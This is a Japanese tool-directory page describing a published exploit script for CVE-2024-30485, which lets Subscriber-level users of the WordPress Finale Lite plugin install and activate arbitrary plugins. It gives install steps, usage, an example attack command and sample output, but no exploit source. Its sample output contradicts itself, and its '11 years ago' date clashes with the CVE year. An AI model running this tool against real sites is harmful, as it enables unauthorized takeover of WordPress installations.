Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-30485 — WordPress Finale Lite プラグイン <= 2.18.0 - Subscriber+ による任意のプラグインのインストール/有効化の脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-30485
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-30485

CVE-2024-30485

WordPress Finale Lite プラグイン <= 2.18.0 - Subscriber+ による任意のプラグインのインストール/有効化の脆弱性

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-30485 エクスプロイト

📌 概要

CVE-2024-30485 は、WordPress 用 Finale Lite プラグイン (バージョン <= 2.18.0) で発見された深刻度の高い脆弱性です。この脆弱性により、認証されたユーザー (Subscriber 以上) は、適切な認可なしに任意のプラグインをインストールおよび有効化できます。

  • 深刻度: 高 (CVSS 8.8)
  • 影響を受けるバージョン: Finale Lite <= 2.18.0
  • CWE: CWE-862 (認可の欠如)

🚀 機能

  • ✅ WordPress サイトが脆弱かどうかを確認
  • ✅ 有効な資格情報で認証
  • ✅ セキュリティ nonce を抽出
  • ✅ 任意のプラグインをインストール
  • ✅ インストールしたプラグインを有効化

🛠 要件

  • Python 3
  • requests および beautifulsoup4 モジュール
  • 脆弱なプラグインがインストールされた対象 WordPress サイト
  • 有効な WordPress Subscriber+ 資格情報

📜 インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485

# Install dependencies
pip install -r requirements.txt

🔍 使用方法

root@kitploit:~
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi

positional arguments:
  plugin                Plugin slug

options:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET  WordPress site URL
  -U USERNAME, --username USERNAME  WordPress username
  -P PASSWORD, --password PASSWORD  WordPress password

例:

root@kitploit:~
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments

🖥 出力例

root@kitploit:~
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}

⚠️ 免責事項

このスクリプトは教育およびセキュリティ研究目的のみで使用してください。許可なくシステムに対して不正にテストを行うことは違法です。責任を持って使用してください。

🔗 参照

  • 公式 CVE レコード
  • WordPress プラグインページ

作者: Khaled Alenazi (Nxploit)

ツールをダウンロード